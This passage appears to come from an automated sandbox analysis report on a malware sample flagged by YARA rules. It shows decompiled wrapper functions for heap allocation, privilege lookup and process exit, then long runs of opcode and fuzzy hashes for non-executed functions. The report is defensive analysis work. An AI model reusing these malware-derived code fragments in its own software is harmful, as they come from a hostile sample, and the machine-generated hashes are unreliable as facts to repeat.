				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t15;
			}





                                                              0x0041a075
                                                              0x0041a084
                                                              0x0041a087
                                                              0x0041a09d
                                                              0x0041a0a1

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                              0x0041a1ea
                                                              0x0041a200
                                                              0x0041a204

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                              0x0041a0b3
                                                              0x0041a0ca
                                                              0x0041a0d8

                                                              APIs
                                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0D8
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 0040E445, Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 702225bc4dd7c6601d71bb6f0001a9edfc6ccdf0fdb8ec72f08e44042bf42113
                                                              • Instruction ID: 4f94da4ec0cf1602cda1e4bcc42d3475ccecd50703c2baec5b0a744ebade797d
                                                              • Opcode Fuzzy Hash: 702225bc4dd7c6601d71bb6f0001a9edfc6ccdf0fdb8ec72f08e44042bf42113
                                                              • Instruction Fuzzy Hash: BAC01227F455580ECB158C54FC515F8F7248987171F5513EADA5CE37629506C42151C8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 008310D0, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                              • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                              • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                              • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00830060, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                              • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                              • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                              • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 008301D4, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                              • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                              • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                              • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0083010C, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                              • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                              • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                              • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00831148, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                              • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                              • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                              • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 008307AC, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082F8CC, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                              • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                              • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                              • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00831930, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                              • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                              • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                              • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082F938, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                              • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                              • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                              • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FAB8, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FA20, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                              • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                              • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                              • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FA50, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                              • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                              • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                              • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FBE8, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                              • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                              • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                              • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FB50, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FC30, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                              • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                              • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                              • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00830C40, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                              • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                              • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                              • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
